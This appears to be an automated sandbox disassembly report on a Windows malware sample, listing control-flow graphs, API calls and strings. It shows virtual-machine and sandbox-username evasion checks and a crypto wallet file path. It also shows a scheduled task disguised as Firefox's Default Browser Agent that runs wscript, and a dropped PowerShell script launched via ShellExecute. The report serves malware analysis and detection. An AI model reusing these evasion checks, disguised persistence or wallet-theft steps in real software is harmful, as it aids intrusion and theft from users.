                control_flow_graph 0 11f8620-11f8630 call 11f90a0 3 11f8632-11f8640 0->3 3->3 4 11f8642-11f8668 EnumDisplayDevicesW 3->4 5 11f86da-11f870e GetModuleHandleA GetProcAddress * 2 4->5 6 11f866a 4->6 8 11f8716-11f8754 ExpandEnvironmentStringsW * 2 GetFileAttributesW 5->8 9 11f8710-11f8713 5->9 7 11f8670-11f8681 StrStrIW 6->7 10 11f8687-11f8697 StrStrIW 7->10 11 11f8775-11f877d 7->11 12 11f877e-11f8780 8->12 13 11f8756-11f8758 8->13 9->8 10->11 16 11f869d-11f86ad StrStrIW 10->16 14 11f8787-11f87d4 SHGetFolderPathW * 2 PathCombineW GetFileAttributesW 12->14 15 11f8782 12->15 13->12 17 11f875a-11f8766 GetFileAttributesW 13->17 20 11f87da-11f8802 14->20 21 11f87d6-11f87d8 14->21 15->14 16->11 19 11f86b3-11f86c3 StrStrIW 16->19 17->12 18 11f8768-11f876a 17->18 18->12 22 11f876c-11f876e 18->22 19->11 23 11f86c9-11f86d8 EnumDisplayDevicesW 19->23 24 11f8805-11f882b PathCombineW GetFileAttributesW 20->24 21->11 21->20 22->11 25 11f8770 22->25 23->5 23->7 26 11f882d-11f882f 24->26 27 11f8835 24->27 25->11 26->27 28 11f8831-11f8833 26->28 29 11f8837-11f8847 27->29 28->29 29->24 30 11f8849-11f8852 29->30 30->11 31 11f8858-11f889a PathCombineW * 2 GetFileAttributesW 30->31 32 11f8a1e-11f8a43 PathCombineW GetFileAttributesW 31->32 33 11f88a0-11f88a2 31->33 35 11f8b09-11f8b2c ExpandEnvironmentStringsW GetFileAttributesW 32->35 36 11f8a49-11f8a4b 32->36 33->32 34 11f88a8-11f88b4 GetFileAttributesW 33->34 34->32 39 11f88ba-11f88bc 34->39 37 11f8b2e-11f8b30 35->37 38 11f8b53-11f8bb9 GetComputerNameW GetUserNameW 35->38 36->35 40 11f8a51-11f8a7d CreateFileW 36->40 37->38 41 11f8b32-11f8b47 GetFileAttributesExW 37->41 43 11f8bc0-11f8bd2 lstrcmpW 38->43 39->32 42 11f88c2-11f88fb CreateFileW 39->42 44 11f8a7f-11f8a9e GetFileSize GetProcessHeap HeapAlloc 40->44 45 11f8ac2-11f8aca 40->45 41->38 46 11f8b49-11f8b4d 41->46 47 11f893e-11f8963 CreateFileW 42->47 48 11f88fd-11f891e GetFileSize GetProcessHeap HeapAlloc 42->48 43->11 49 11f8bd8-11f8bdd 43->49 50 11f8ab9-11f8abc CloseHandle 44->50 51 11f8aa0-11f8ab6 ReadFile 44->51 52 11f8acc-11f8ae8 lstrcmpA 45->52 53 11f8aeb-11f8aed 45->53 46->11 46->38 57 11f89a8-11f89b0 47->57 58 11f8965-11f8984 GetFileSize GetProcessHeap HeapAlloc 47->58 54 11f8937-11f8938 CloseHandle 48->54 55 11f8920-11f8934 ReadFile 48->55 49->43 56 11f8bdf-11f8bf3 StrStrW 49->56 50->45 51->50 52->53 59 11f8aff-11f8b03 53->59 60 11f8aef-11f8af9 GetProcessHeap HeapFree 53->60 54->47 55->54 56->11 61 11f8bf9-11f8c09 56->61 64 11f89e9-11f89ee 57->64 65 11f89b2-11f89b6 57->65 62 11f899f-11f89a2 CloseHandle 58->62 63 11f8986-11f899c ReadFile 58->63 59->11 59->35 60->59 68 11f8c10-11f8c1f lstrcmpW 61->68 62->57 63->62 66 11f8a00-11f8a02 64->66 67 11f89f0-11f89fa GetProcessHeap HeapFree 64->67 65->64 69 11f89b8-11f89c8 lstrcmpA 65->69 71 11f8a14-11f8a18 66->71 72 11f8a04-11f8a0e GetProcessHeap HeapFree 66->72 67->66 68->11 73 11f8c25-11f8c2a 68->73 69->64 70 11f89ca-11f89e6 lstrcmpA 69->70 70->64 71->11 71->32 72->71 73->68 74 11f8c2c-11f8c59 GlobalMemoryStatusEx 73->74 74->11 75 11f8c5f-11f8c7a PathCombineW 74->75 76 11f8c80-11f8c8e 75->76 76->76 77 11f8c90-11f8caa FindFirstFileW 76->77 78 11f8da2-11f8dcf GetModuleFileNameW StrStrIW 77->78 79 11f8cb0-11f8cb7 77->79 80 11f8cc0-11f8cd0 lstrcmpW 79->80 81 11f8cd6-11f8ce6 lstrcmpW 80->81 82 11f8d74-11f8d84 FindNextFileW 80->82 81->82 83 11f8cec-11f8cfe 81->83 82->80 84 11f8d8a-11f8d9c FindClose 82->84 85 11f8d17-11f8d29 lstrcmpW 83->85 86 11f8d00-11f8d15 83->86 84->11 84->78 87 11f8d2b-11f8d35 lstrcmpW 85->87 88 11f8d37-11f8d41 lstrcmpW 85->88 86->85 86->86 87->88 89 11f8d71 87->89 90 11f8d4f-11f8d60 88->90 91 11f8d43-11f8d4d lstrcmpW 88->91 89->82 90->82 92 11f8d62-11f8d69 90->92 91->89 91->90 92->82 93 11f8d6b-11f8d6f 92->93 93->82
                APIs
                • EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 011F865E
                • StrStrIW.KERNELBASE(?,Hyper-V), ref: 011F867D
                • StrStrIW.SHLWAPI(?,VMWare), ref: 011F8693
                • StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 011F86A9
                • StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 011F86BF
                • EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 011F86D4
                • GetModuleHandleA.KERNEL32(kernel32), ref: 011F86DF
                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 011F86F3
                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 011F86FE
                • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 011F872D
                • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 011F8740
                • GetFileAttributesW.KERNELBASE(?), ref: 011F874F
                • GetFileAttributesW.KERNEL32(?), ref: 011F8761
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: AddressAttributesDevicesDisplayEnumEnvironmentExpandFileProcStrings$HandleModule
                • String ID: %appdata%\Jaxx\Local Storage\wallet.dat$%systemroot%\System32\VBoxService.exe$%systemroot%\System32\VBoxTray.exe$7$7$@$Are.docx$BAIT$FORTI-PC$Files.docx$Harry Johnson$Hyper-V$Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo$Joe Cage$OpenVPN.txt$Opened.docx$PJones$Parallels Display Adapter$Paul Jones$Recently.docx$Red Hat QXL controller$Resource.txt$SFTOR-PC$STRAZNJICA.GRUBUTT$These.docx$VMWare$WDAGUtilityAccount$WILLCARTER-PC$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$d5.vc/g$doc$docx$kernel32$new songs.txt$powershell.exe$sal.rosenburg$xls$xlsx
                • API String ID: 4266617301-2422100297
                • Opcode ID: deccb596b24863f1598f33d1a64e42838a4ff02d63d98ad7fb643db1a5148cf1
                • Instruction ID: 6045deaadda832a885c696d2711ab9d9927b75404574003f4333df999664147b
                • Opcode Fuzzy Hash: deccb596b24863f1598f33d1a64e42838a4ff02d63d98ad7fb643db1a5148cf1
                • Instruction Fuzzy Hash: 91227F71900219ABDF299BA8CC48BEE7BBCBF45710F14466DE624F2180E7349A85CF64

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 94 791300-791350 GetModuleHandleA VirtualAlloc 95 791359-791387 call 796380 94->95 96 791352-791354 94->96 101 791395-7913a2 95->101 97 7916a6-7916b3 call 793a94 96->97 103 7913e1-7913f9 101->103 104 7913a4-7913df call 796380 101->104 105 7914ef-791528 call 7911f0 VirtualProtect 103->105 106 7913ff-791406 103->106 104->101 114 791536-791543 105->114 106->105 109 79140c-791417 106->109 113 791422-791429 109->113 113->105 115 79142f-791463 GetModuleHandleA GetProcAddress LoadLibraryA 113->115 116 791549-791571 114->116 117 79164a-791663 114->117 118 791469-791486 115->118 119 7914ea 115->119 123 791593-7915ad 116->123 124 791573-791591 VirtualFree 116->124 121 7916a3 117->121 122 791665-791679 117->122 125 791488-79148b 118->125 126 79148e 118->126 119->113 121->97 127 791684-791688 122->127 129 7915b8 123->129 130 7915af-7915b6 123->130 128 79152a-791532 124->128 125->126 131 7914a2-7914a8 126->131 127->121 132 79168a-791690 127->132 128->114 133 7915bf-7915c7 129->133 130->133 131->119 134 7914aa-7914b5 131->134 132->121 135 791692-7916a1 132->135 136 7915c9-7915d0 133->136 137 7915d2 133->137 138 7914b7-7914c4 134->138 139 7914c6-7914d2 134->139 135->127 140 7915d9-7915e2 136->140 137->140 141 7914d5-7914e8 GetProcAddress 138->141 139->141 143 7915ed 140->143 144 7915e4-7915eb 140->144 141->131 146 7915f4-791616 143->146 144->146 148 791618-791621 146->148 149 791624-79163f VirtualProtect 146->149 148->149 149->117
                APIs
                • GetModuleHandleA.KERNEL32(kernel32), ref: 0079132A
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00791343
                • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA), ref: 00791439
                • GetProcAddress.KERNEL32(00000000), ref: 00791440
                • LoadLibraryA.KERNELBASE(?), ref: 00791459
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: HandleModule$AddressAllocLibraryLoadProcVirtual
                • String ID: LoadLibraryA$kernel32
                • API String ID: 3393750808-970291620
                • Opcode ID: 5de4592cb9f707bab4f9edde7cd1b9a6400ec85a4a5198ed713568af76cdd487
                • Instruction ID: d6f7580c4574d1fe1e419664212cb40a3a49298bf958b4dc2207757fe63f95ea
                • Opcode Fuzzy Hash: 5de4592cb9f707bab4f9edde7cd1b9a6400ec85a4a5198ed713568af76cdd487
                • Instruction Fuzzy Hash: 6FD1F674E0021ADFDF08CF98D894AEEB7B2FF88304F548159E506AB395D738A991CB54

                Control-flow Graph

                APIs
                • LPtoDP.GDI32(00000000,000C2BFF,020ECD74), ref: 00792F77
                • GetLastError.KERNEL32 ref: 00792F81
                • ExitProcess.KERNEL32 ref: 00792F8E
                • BuildCommDCBAndTimeoutsA.KERNEL32(jhl46745fghb,00000000,00000000), ref: 00792F9D
                • GetCurrentProcess.KERNEL32(00000000), ref: 00792FA9
                • TerminateProcess.KERNEL32(00000000), ref: 00792FB0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: Process$BuildCommCurrentErrorExitLastTerminateTimeouts
                • String ID: jhl46745fghb
                • API String ID: 3772419538-1856006033
                • Opcode ID: 346c00d549692a1965fd24a5229cb04167829fbe8a02dec95897f187af158f90
                • Instruction ID: c1dd6e967050888c45a0715b4473842b6eb5940541103b5e7d379936af9c62c9
                • Opcode Fuzzy Hash: 346c00d549692a1965fd24a5229cb04167829fbe8a02dec95897f187af158f90
                • Instruction Fuzzy Hash: EB015234A00348EBEB20EFA0ED0AB9E7774AF46741F408098E506A6191DF7C9944DB55

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 164 11f8dd0-11f8de7 GetUserDefaultLangID 165 11f8ded-11f8df5 164->165 166 11f8e7c-11f8e7e ExitProcess 164->166 165->166 167 11f8dfb-11f8e03 165->167 167->166 168 11f8e05-11f8e0d 167->168 168->166 169 11f8e0f-11f8e17 168->169 169->166 170 11f8e19-11f8e21 169->170 170->166 171 11f8e23-11f8e2b 170->171 171->166 172 11f8e2d-11f8e35 171->172 172->166 173 11f8e37-11f8e3f 172->173 173->166 174 11f8e41-11f8e49 173->174 174->166 175 11f8e4b-11f8e53 174->175 175->166 176 11f8e55 call 11f8620 175->176 178 11f8e5a-11f8e5c 176->178 178->166 179 11f8e5e-11f8e77 call 11f8340 call 11f7170 call 11f8f40 call 11f7650 call 11f8530 178->179 179->166
                APIs
                • GetUserDefaultLangID.KERNEL32 ref: 011F8DD6
                • ExitProcess.KERNEL32 ref: 011F8E7E
                  • Part of subcall function 011F8620: EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 011F865E
                  • Part of subcall function 011F8620: StrStrIW.KERNELBASE(?,Hyper-V), ref: 011F867D
                  • Part of subcall function 011F8620: StrStrIW.SHLWAPI(?,VMWare), ref: 011F8693
                  • Part of subcall function 011F8620: StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 011F86A9
                  • Part of subcall function 011F8620: StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 011F86BF
                  • Part of subcall function 011F8620: EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 011F86D4
                  • Part of subcall function 011F8620: GetModuleHandleA.KERNEL32(kernel32), ref: 011F86DF
                  • Part of subcall function 011F8620: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 011F86F3
                  • Part of subcall function 011F8620: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 011F86FE
                  • Part of subcall function 011F8620: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 011F872D
                  • Part of subcall function 011F8620: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 011F8740
                  • Part of subcall function 011F8620: GetFileAttributesW.KERNELBASE(?), ref: 011F874F
                  • Part of subcall function 011F8620: GetFileAttributesW.KERNEL32(?), ref: 011F8761
                  • Part of subcall function 011F8340: InitializeCriticalSection.KERNEL32(011FA080), ref: 011F8362
                  • Part of subcall function 011F8340: GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 011F838F
                  • Part of subcall function 011F8340: StringFromGUID2.OLE32(?,?,00000080), ref: 011F83E8
                  • Part of subcall function 011F8340: wsprintfA.USER32 ref: 011F83FF
                  • Part of subcall function 011F8340: CreateMutexW.KERNEL32(00000000,00000001,?), ref: 011F8413
                  • Part of subcall function 011F8340: GetLastError.KERNEL32 ref: 011F841E
                  • Part of subcall function 011F8340: WSAStartup.WS2_32(00000202,?), ref: 011F845C
                  • Part of subcall function 011F8340: CryptAcquireContextA.ADVAPI32(011FA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 011F8475
                  • Part of subcall function 011F8340: CryptAcquireContextA.ADVAPI32(011FA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 011F8491
                  • Part of subcall function 011F7170: ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 011F7191
                  • Part of subcall function 011F7170: lstrlenW.KERNEL32(?), ref: 011F719A
                  • Part of subcall function 011F7170: ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104), ref: 011F71B5
                  • Part of subcall function 011F7170: GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 011F71C3
                  • Part of subcall function 011F7170: GetLastError.KERNEL32 ref: 011F71CD
                  • Part of subcall function 011F7170: ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\agent.js,?,00000104), ref: 011F71E4
                  • Part of subcall function 011F7170: wnsprintfW.SHLWAPI ref: 011F71FE
                  • Part of subcall function 011F7170: SetFileAttributesW.KERNEL32(?,00000006), ref: 011F721E
                  • Part of subcall function 011F8F40: CryptGenRandom.ADVAPI32(00000020,?), ref: 011F8F58
                  • Part of subcall function 011F8F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F8FB5
                  • Part of subcall function 011F8F40: HeapFree.KERNEL32(00000000), ref: 011F8FBC
                  • Part of subcall function 011F8F40: wsprintfA.USER32 ref: 011F8FEF
                  • Part of subcall function 011F8F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F9028
                  • Part of subcall function 011F8F40: HeapFree.KERNEL32(00000000), ref: 011F902B
                  • Part of subcall function 011F8F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F9030
                  • Part of subcall function 011F8F40: HeapFree.KERNEL32(00000000), ref: 011F9033
                  • Part of subcall function 011F7650: LsaOpenPolicy.ADVAPI32(00000000,011FA060,00000001,?), ref: 011F768C
                  • Part of subcall function 011F7650: LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 011F769F
                  • Part of subcall function 011F7650: GetProcessHeap.KERNEL32(00000008,?), ref: 011F76BB
                  • Part of subcall function 011F7650: HeapAlloc.KERNEL32(00000000), ref: 011F76C2
                  • Part of subcall function 011F7650: LsaFreeMemory.ADVAPI32(?), ref: 011F76FC
                  • Part of subcall function 011F7650: LsaClose.ADVAPI32(?), ref: 011F7705
                  • Part of subcall function 011F7650: GetComputerNameW.KERNEL32(?,?), ref: 011F7724
                  • Part of subcall function 011F7650: GetUserNameW.ADVAPI32(?,00000101), ref: 011F7735
                  • Part of subcall function 011F8530: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 011F8551
                  • Part of subcall function 011F8530: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 011F8564
                  • Part of subcall function 011F8530: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 011F8577
                  • Part of subcall function 011F8530: GetFileAttributesW.KERNEL32(?), ref: 011F859D
                  • Part of subcall function 011F8530: lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 011F85CD
                  • Part of subcall function 011F8530: wnsprintfW.SHLWAPI ref: 011F85F0
                  • Part of subcall function 011F8530: ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 011F8612
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: EnvironmentExpandHeapStrings$Process$AttributesFileFree$Crypt$AcquireAddressContextDevicesDisplayEnumErrorInformationLastNamePolicyProcUserwnsprintfwsprintf$AllocCloseComputerCreateCriticalDefaultDirectoryExecuteExitFromHandleInitializeLangMemoryModuleMutexOpenQueryRandomSectionShellStartupStringSystemVolumeWow64lstrcpylstrlen
                • String ID:
                • API String ID: 1304186597-0
                • Opcode ID: 0bae34a8fe3871f83da55bbfae38b75a8a71724d18d24410af19453062cce085
                • Instruction ID: 6f4f6a30d1230a3739f5f33b17eb5c18ed6172723262dd2ce792de2220361d5c
                • Opcode Fuzzy Hash: 0bae34a8fe3871f83da55bbfae38b75a8a71724d18d24410af19453062cce085
                • Instruction Fuzzy Hash: 17017D5C68611206FF3C795C90242BC394ADFD4265FC8812E9BE647DEA8F240E87026F

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 190 791710-79175a call 791110 * 2 195 79183f-791858 call 796940 call 793a94 190->195 196 791760-791764 190->196 196->195 198 79176a-79176e 196->198 198->195 200 791774-791778 198->200 200->195 201 79177e-79179c call 796b68 200->201 206 7917a7-7917ad 201->206 207 7917af-7917c0 206->207 208 7917c2-79182b call 7916c0 call 791300 GetPEB GetUserDefaultLCID call 796940 206->208 207->206 215 791830-79183c call 796940 208->215 215->195
                APIs
                  • Part of subcall function 00791110: GetModuleHandleA.KERNEL32(kernel32), ref: 0079111B
                  • Part of subcall function 00791110: GetModuleHandleW.KERNEL32(00000000), ref: 00791162
                • GetUserDefaultLCID.KERNELBASE ref: 00791824
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: HandleModule$DefaultUser
                • String ID:
                • API String ID: 3008646163-0
                • Opcode ID: b267cef1017148316758061a5e1f138abf90cad64625fba847ec0e24261af25d
                • Instruction ID: 1ae3121c739be935ea29dfe2dbc5337152efd7a86a6964fc56ead3736ef20059
                • Opcode Fuzzy Hash: b267cef1017148316758061a5e1f138abf90cad64625fba847ec0e24261af25d
                • Instruction Fuzzy Hash: CD4115B5E0020ADFCF04DF98E885AEEB7B5BF48304F548559E505A7341D738AA51CFA1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 277 11f6bc0-11f6c19 VariantInit CoCreateInstance 278 11f6c1b-11f6c4a 277->278 279 11f6c79 277->279 278->279 285 11f6c4c-11f6c6c SysAllocString 278->285 280 11f6c7c-11f6c7f 279->280 281 11f6c83-11f6c8b 280->281 283 11f6c8d-11f6c8e SysFreeString 281->283 284 11f6c90-11f6c94 281->284 283->284 286 11f6fea-11f6fef 284->286 287 11f6c9a-11f6ccb SysAllocString SysFreeString 284->287 285->280 292 11f6c6e-11f6c77 285->292 288 11f6ff7-11f7000 286->288 289 11f6ff1-11f6ff3 286->289 293 11f6ced-11f6cef 287->293 294 11f6ccd-11f6cea SysAllocString SysFreeString 287->294 289->288 292->281 295 11f6d09-11f6d21 293->295 296 11f6cf1-11f6d07 SysAllocString SysFreeString 293->296 294->293 300 11f6d27-11f6d3d 295->300 301 11f6fe1-11f6fe5 295->301 296->295 303 11f6d3f-11f6d7b SysAllocString SysFreeString SysAllocString SysFreeString 300->303 304 11f6d80-11f6d96 300->304 301->286 303->304 307 11f6d98-11f6ddf SysAllocString SysFreeString 304->307 308 11f6de4-11f6e08 304->308 307->308 313 11f6e0e-11f6e1f 308->313 314 11f6ea6-11f6eab 308->314 313->314 321 11f6e25-11f6e38 313->321 315 11f6ead-11f6eaf 314->315 316 11f6eb3-11f6eb8 314->316 315->316 319 11f6eba-11f6ebc 316->319 320 11f6ec0-11f6ee4 316->320 319->320 326 11f6f46-11f6f4b 320->326 327 11f6ee6-11f6ef7 320->327 321->314 328 11f6e3a-11f6e7c SysAllocString SysFreeString SysAllocString SysFreeString 321->328 329 11f6f4d-11f6f4f 326->329 330 11f6f53-11f6f58 326->330 327->326 336 11f6ef9-11f6f0c 327->336 345 11f6e7e-11f6e98 SysAllocString SysFreeString 328->345 346 11f6e9d-11f6ea1 328->346 329->330 332 11f6f5a-11f6f5c 330->332 333 11f6f60-11f6f64 330->333 332->333 337 11f6fd8-11f6fdc 333->337 338 11f6f66-11f6fd2 VariantInit SysAllocString * 2 SysFreeString VariantClear 333->338 336->326 342 11f6f0e-11f6f29 SysAllocString SysFreeString 336->342 337->301 338->337 347 11f6f3d-11f6f41 342->347 348 11f6f2b-11f6f3b SysAllocString SysFreeString 342->348 345->346 346->314 347->326 348->347
                APIs
                • VariantInit.OLEAUT32(?), ref: 011F6BDE
                • CoCreateInstance.OLE32(011F1020,00000000,00000001,011F1000,?,?,76230EE0), ref: 011F6C0B
                • SysAllocString.OLEAUT32(011F1498), ref: 011F6C51
                • SysFreeString.OLEAUT32(?), ref: 011F6C8E
                • SysAllocString.OLEAUT32(\Mozilla), ref: 011F6C9F
                • SysFreeString.OLEAUT32(00000000), ref: 011F6CC1
                • SysAllocString.OLEAUT32(\Mozilla), ref: 011F6CD2
                • SysFreeString.OLEAUT32(00000000), ref: 011F6CE8
                • SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 011F6CF6
                • SysFreeString.OLEAUT32(00000000), ref: 011F6D07
                • SysAllocString.OLEAUT32(The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic), ref: 011F6D44
                • SysFreeString.OLEAUT32(00000000), ref: 011F6D53
                • SysAllocString.OLEAUT32(Mozilla), ref: 011F6D5A
                • SysFreeString.OLEAUT32(00000000), ref: 011F6D69
                • SysAllocString.OLEAUT32(PT0S), ref: 011F6DBE
                • SysFreeString.OLEAUT32(00000000), ref: 011F6DCD
                • SysAllocString.OLEAUT32(Trigger1), ref: 011F6E3F
                • SysFreeString.OLEAUT32(00000000), ref: 011F6E4E
                • SysAllocString.OLEAUT32(2023-01-01T12:00:00), ref: 011F6E55
                • SysFreeString.OLEAUT32(00000000), ref: 011F6E64
                • SysAllocString.OLEAUT32(PT1M), ref: 011F6E83
                • SysFreeString.OLEAUT32(00000000), ref: 011F6E92
                • SysAllocString.OLEAUT32(C:\Windows\System32\wscript.exe), ref: 011F6F13
                • SysFreeString.OLEAUT32(00000000), ref: 011F6F22
                • SysAllocString.OLEAUT32(?), ref: 011F6F2C
                • SysFreeString.OLEAUT32(00000000), ref: 011F6F3B
                • VariantInit.OLEAUT32(?), ref: 011F6F6A
                • SysAllocString.OLEAUT32(011F113C), ref: 011F6F7E
                • SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 011F6F8F
                • SysFreeString.OLEAUT32(00000000), ref: 011F6FCC
                • VariantClear.OLEAUT32(?), ref: 011F6FD2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: String$Alloc$Free$Variant$Init$ClearCreateInstance
                • String ID: 2023-01-01T12:00:00$C:\Windows\System32\wscript.exe$Firefox Default Browser Agent 458046B0AF4A39CB$Mozilla$PT0S$PT1M$The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic$Trigger1$\Mozilla
                • API String ID: 3904693211-711907784
                • Opcode ID: a50e518b965601424750a52615e8c91f0b23071fe0d0f884c4f8e62ab0030e8d
                • Instruction ID: 89af38c3a03844883b2286bf25489a15e2fe35b8e781009dc0db39b3732d7b7a
                • Opcode Fuzzy Hash: a50e518b965601424750a52615e8c91f0b23071fe0d0f884c4f8e62ab0030e8d
                • Instruction Fuzzy Hash: FBF1F871A00219AFDB14DFA9C948FAEBBB8FF49304F10415CF609EB251DB71A945CB61

                Control-flow Graph

                APIs
                • GetModuleHandleW.KERNEL32(ntdll), ref: 011F5E8D
                • GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 011F5EA1
                • GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 011F5EAC
                • GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 011F5EB7
                • GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 011F5EC2
                • GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 011F5ECD
                • GetTempPathW.KERNEL32(000000F6,?), ref: 011F5EE6
                  • Part of subcall function 011F24A0: GetTickCount.KERNEL32 ref: 011F24A2
                • wnsprintfW.SHLWAPI ref: 011F5F21
                • PathCombineW.SHLWAPI(?,?,?), ref: 011F5F3B
                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 011F5F62
                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 011F5F86
                • SetEndOfFile.KERNEL32(00000000), ref: 011F5F89
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 011F5F96
                • wnsprintfW.SHLWAPI ref: 011F5FB4
                • RtlInitUnicodeString.NTDLL(?,?), ref: 011F5FCA
                • RtlInitUnicodeString.NTDLL(?,?), ref: 011F5FD7
                • GetCurrentProcess.KERNEL32(00000004,00000000,00000000,00000000,00000000), ref: 011F6016
